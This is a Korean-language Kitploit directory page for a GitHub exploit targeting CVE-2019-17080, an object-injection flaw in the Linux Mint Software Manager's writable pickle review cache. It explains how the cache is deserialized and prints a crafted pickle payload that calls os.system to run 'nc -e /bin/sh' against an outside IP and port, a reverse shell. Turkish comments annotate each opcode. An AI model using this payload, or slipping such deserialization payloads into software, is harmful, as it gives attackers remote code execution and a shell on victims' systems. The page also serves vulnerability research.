Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
도구/GitHubGitHub/andhrimnirr/mintinstall-object-injection
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationMisconfiguration
GitHubandhrimnirr/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
16년 전아직 검토되지 않음

Linux Mint 소프트웨어 관리자(v 7.9.5/9)는 잘못된 구성으로 인해 객체 인젝션과 임의 코드를 실행하게 합니다.

root@kitploit:~
mintinsall

새 리뷰가 있으면 new-reviews.list 주소에서 다운로드하여 파일에 기록합니다.

root@kitploit:~
code mintinstall.py

소프트웨어 관리자가 처음 시작되면 reviews 모듈에서 ReviewCache() 클래스를 호출합니다.

데이터를 어떻게 처리하나?

root@kitploit:~
code reviews.py

ReviewCache 클래스가 시작되면(init) _load_cache() 함수를 호출합니다.

Load cache 함수는 REVIEWS_CACHE 변수의 파일을 읽고 pickle 모듈을 사용하여 파일의 데이터를 역직렬화하고 일부 값을 메모리에 보관합니다.

파일을 확인해 보면 쓰기 권한이 있는 것 같습니다.

Pickle 모듈로 직렬화/역직렬화 연산을 수행할 수 있으므로, reduce 메서드를 사용하여 모듈을 포함하고 임의 코드를 실행할 수 있습니다.

파일을 역직렬화하려고 하면 악성 코드가 실행됩니다.

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi 
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

alt-text

도구 다운로드